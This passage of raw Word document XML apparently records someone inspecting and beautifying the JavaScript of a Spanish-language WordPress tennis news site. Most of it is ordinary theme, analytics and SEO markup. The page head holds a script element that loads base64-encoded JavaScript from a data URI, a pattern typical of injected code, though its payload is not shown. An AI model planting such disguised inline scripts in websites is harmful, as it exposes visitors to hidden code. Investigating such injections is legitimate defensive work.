    <w:p w14:paraId="27101FB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location.href = this.href;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E603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46DDED8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4AEF36A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$(".menu-item-has-children").click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56117FB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$(this).addClass("toggled");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E36E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if($(".menu-item-has-children").hasClass("toggled"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DDD9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDACC6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$(this).children("ul").toggle();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADFC6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$(".mvp-fly-nav-menu").getNiceScroll().resize();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8991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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6355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$(this).toggleClass("tog-minus");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12591B9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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84CA5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2453854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332D09F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// Main Menu Scroll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E4881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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>$(window).load(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1745FD7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$(".mvp-fly-nav-menu").niceScroll({cursorcolor:"#888",cursorwidth: 7,cursorborder: 0,zindex:999999});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319F55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45E67B3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361136F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</w:p>
    <w:p w14:paraId="4D76304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4A2683A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jQuery(document).ready(function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296A86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$(".infinite-content").infinitescroll({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6D9A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navSelector: ".mvp-nav-links",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99710D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nextSelector: ".mvp-nav-links a:first",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92EA3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itemSelector: ".infinite-post",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F5E59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 xml:space="preserve">  errorCallback: function(){ $(".mvp-inf-more-but").css("display", "none") }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343629C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0B2AD23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$(window).unbind(".infscr");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE5B4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$(".mvp-inf-more-but").click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B904C1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$(".infinite-content").infinitescroll("retrieve");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C503DF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 xml:space="preserve">        </w:t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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46326E4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17BDAC0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$(window).load(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E5E24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if ($(".mvp-nav-links a").length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE68B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$(".mvp-inf-more-but").css("display","inline-block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934F67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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF60D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$(".mvp-inf-more-but").css("display","none");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791C68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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A2760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4F454ACB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  <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30531B13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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F426CC2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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32534BE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 src='http://todosobretenis.com/wp-content/themes/zox-news/js/scripts.js?ver=4.9.18'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093DFD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 src='http://todosobretenis.com/wp-content/themes/zox-news/js/retina.js?ver=4.9.18'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE3B48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 src='http://todosobretenis.com/wp-content/themes/zox-news/js/jquery.infinitescroll.min.js?ver=4.9.18'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34F14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 src='http://todosobretenis.com/wp-includes/js/comment-reply.min.js?ver=4.9.18'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49190C81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type='text/javascript' src='http://todosobretenis.com/wp-includes/js/wp-embed.min.js?ver=4.9.18'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101974A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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1515D757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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2D5D6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5C02332E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  <w:r w:rsidRPr="00BE2D6D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>&lt;script data-ad-client="ca-pub-9874625214760801" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B724DA5" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="009403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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B198CEE" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5071DF6A" w14:textId="34368F54" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2D6D">
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>---------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779891AF" w14:textId="3319DBEA" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021664DF" w14:textId="431F1512" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2D6D">
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>Now we will want to beautify the JavaScript response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3178A488" w14:textId="7C4CBE3C" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272AF2EB" w14:textId="6D4F10E2" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00067395">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="00BE2D6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="10"/>
            <w:szCs w:val="10"/>
          </w:rPr>
          <w:t>https://beautifier.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D246E6D" w14:textId="0D47A611" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BA8650" w14:textId="5EBF5E03" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E64DE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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7E8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!DOCTYPE html &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F44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0540DF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html lang = "es-AR" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D817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110CF5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head &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392223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6DA7AB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script src = "data:text/javascript;base64,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" &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546838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!--Global site tag(gtag.js) - Google Analytics-- &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4036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6387B9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script async src = "https://www.googletagmanager.com/gtag/js?id=UA-77420967-1" &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D20B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script &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A2B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window.dataLayer = window.dataLayer || [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44E237" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA7491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function gtag() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD0E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dataLayer.push(arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B58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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B93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gtag('js', new Date());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE66A9" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18454E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gtag('config', 'UA-77420967-1'); &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE1D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/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25193EFF" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549277A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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12062D2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meta charset = "UTF-8" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEC3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75A2B8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meta name = "viewport"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9279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id = "viewport"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545171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content = "width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53785A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4B3E6B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link rel = "shortcut icon"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDD2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href = "http://todosobretenis.com/wp-content/uploads/2019/01/TST1.png" / &gt; &lt; link rel = "pingback"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713347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href = "http://todosobretenis.com/xmlrpc.php" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5739C2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5DEFF6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meta property = "og:description"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D2FD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content = "El circuito ATP pasa por acÃ¡" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6090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2984E00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title &gt; Todo Sobre Tenis &lt; /title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699266CB" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307E71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7DC8E0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!--All In One SEO Pack 3.7 .1[3755, 3809]-- &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E494E7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7D53CD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meta name = "description"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130434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content = "Las 24 horas, los 365 dÃ­as del aÃ±o infÃ³rmate sobre el circuito ATP con Todo Sobre Tenis. Noticias, coberturas, entrevistas y en un solo lugar" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EBB11" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0B4E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4ED4F7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script type = "application/ld+json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1918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class = "aioseop-schema" &gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC663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"@context": "https://schema.org",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1D0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"@graph": [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C62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"@type": "Organization",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393788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"@id": "http://todosobretenis.com/#organization",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272CC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"url": "http://todosobretenis.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290AEF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"name": "Todo Sobre Tenis",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239401F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"sameAs": []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BEDC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}, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D69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"@type": "WebSite",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C59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"@id": "http://todosobretenis.com/#website",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E455F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"url": "http://todosobretenis.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A73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"name": "Todo Sobre Tenis",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671AEE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"publisher": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C291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"@id": "http://todosobretenis.com/#organization"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3232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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6E18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"potentialAction": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF608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"@type": "SearchAction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA38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"target": "http://todosobretenis.com/?s={search_term_string}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C83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"query-input": "required name=search_term_string"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B23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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7087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}, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F30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"@type": "WebPage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED41E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"@id": "http://todosobretenis.com#webpage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB26F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"url": "http://todosobretenis.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E2D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"inLanguage": "es-AR",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ACE7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"name": "Todo Sobre Tenis",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253EC1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"isPartOf": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739856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"@id": "http://todosobretenis.com/#website"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644BB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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E835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"breadcrumb": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3864C0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"@id": "http://todosobretenis.com#breadcrumblist"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39F6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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A6B4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"description": "Las 24 horas, los 365 dÃ­as del aÃ±o infÃ³rmate sobre el circuito ATP con Todo Sobre Tenis. Noticias, coberturas, entrevistas y en un solo lugar",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645939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"datePublished": "2019-01-18T21:35:47+00:00",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF6D9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"dateModified": "2020-01-20T15:27:17+00:00",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEBC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"about": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749444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"@id": "http://todosobretenis.com/#organization"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CA7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79DA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}, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2675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"@type": "BreadcrumbList",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903EB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"@id": "http://todosobretenis.com#breadcrumblist",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C8D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"itemListElement": [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73485A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"@type": "ListItem",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB0D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"position": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDEC2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"item": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C946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"@type": "WebPage",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AFBFC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"@id": "http://todosobretenis.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D4A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"url": "http://todosobretenis.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFC16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"name": "Todo Sobre Tenis"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500B8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47A2E7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}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9DCC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}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B4AA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 &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCDC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link rel = "canonical"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD37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href = "http://todosobretenis.com/" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473202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64A894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!--All In One SEO Pack-- &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A33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63A7BB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link rel = 'dns-prefetch'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE28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href = '//fonts.googleapis.com' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDEF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3A01BC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link rel = 'dns-prefetch'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4AE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href = '//s.w.org' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC944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1362E2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link rel = "alternate"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394F5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type = "application/rss+xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1498D0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title = "Todo Sobre Tenis &amp;raquo; Feed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457D36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href = "http://todosobretenis.com/feed/" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BF7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4D723E7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link rel = "alternate"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D437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type = "application/rss+xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A86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title = "Todo Sobre Tenis &amp;raquo; RSS de los comentarios"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC160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href = "http://todosobretenis.com/comments/feed/" / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2D0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5534FE2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script type = "text/javascript" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D077F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window._wpemojiSettings = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BAEC3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"baseUrl": "https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503D8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"ext": ".png",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F95E2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"svgUrl": "https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742791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"svgExt": ".svg",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04A6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"source": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26790F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"concatemoji": "http:\/\/todosobretenis.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.18"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5B71F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082FA5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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EC6B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! function(e, a, t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6245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var n, r, o, i = a.createElement("canvas"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC05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p = i.getContext &amp;&amp; i.getContext("2d");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CBE3AF" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EA5E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function s(e, t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543582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var a = String.fromCharCode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCC5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p.clearRect(0, 0, i.width, i.height), p.fillText(a.apply(this, e), 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B950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e = i.toDataURL();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D631C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return p.clearRect(0, 0, i.width, i.height), p.fillText(a.apply(this, t), 0, 0), e === i.toDataURL()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38B55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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00906F38" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400770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function c(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FC1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var t = a.createElement("script");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583398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t.src = e, t.defer = t.type = "text/javascript", a.getElementsByTagName("head")[0].appendChild(t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D3E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB58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for (o = Array("flag", "emoji"), t.supports = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885BCB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everything: !0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA67A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everythingExceptFlag: !0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C873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}, r = 0; r &lt; o.length; r++) t.supports[o[r]] = function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43134F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if (!p || !p.fillText) return !1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7ECC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switch (p.textBaseline = "top", p.font = "600 32px Arial", e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A73F2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case "flag":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26236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return s([55356, 56826, 55356, 56819], [55356, 56826, 8203, 55356, 56819]) ? !1 : !s([55356, 57332, 56128, 56423, 56128, 56418, 56128, 56421, 56128, 56430, 56128, 56423, 56128, 56447], [55356, 57332, 8203, 56128, 56423, 8203, 56128, 56418, 8203, 56128, 56421, 8203, 56128, 56430, 8203, 56128, 56423, 8203, 56128, 56447]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2991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case "emoji":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCDA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return !s([55358, 56760, 9792, 65039], [55358, 56760, 8203, 9792, 65039])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E7EC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29583A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return !1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C9BA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}(o[r]), t.supports.everything = t.supports.everything &amp;&amp; t.supports[o[r]], "flag" !== o[r] &amp;&amp; (t.supports.everythingExceptFlag = t.supports.everythingExceptFlag &amp;&amp; t.supports[o[r]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1178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t.supports.everythingExceptFlag = t.supports.everythingExceptFlag &amp;&amp; !t.supports.flag, t.DOMReady = !1, t.readyCallback = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F77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t.DOMReady = !0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EAC9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}, t.supports.everything || (n = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45D9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t.readyCallback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACCC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}, a.addEventListener ? (a.addEventListener("DOMContentLoaded", n, !1), e.addEventListener("load", n, !1)) : (e.attachEvent("onload", n), a.attachEvent("onreadystatechange", function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543FC95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"complete" === a.readyState &amp;&amp; t.readyCallback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1AFB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})), (n = t.source || {}).concatemoji ? c(n.concatemoji) : n.wpemoji &amp;&amp; n.twemoji &amp;&amp; (c(n.twemoji), c(n.wpemoji)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BE8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}(window, document, window._wpemojiSettings); &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C368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/script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249B03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style type = "text/css" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8E9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img.wp - smiley,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FA4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img.emoji {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C4B1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display: inline!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9D3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border: none!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01617E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box - shadow: none!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144A55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height: 1 em!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C90B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width: 1 em!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCEE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margin: 0 .07 em!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C260A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vertical - align: -0.1 em!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A92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background: none!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358E73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padding: 0!important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3C1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 &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064353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/style&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDA5AD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link rel = 'stylesheet'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DC73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id = 'mvp-custom-style-css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F3DF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href = 'http://todosobretenis.com/wp-content/themes/zox-news/style.css?ver=4.9.18'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38F8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type = 'text/css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379039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media = 'all' / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330640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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EDA5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style id = 'mvp-custom-style-inline-css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E434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type = 'text/css' &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B78E52" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
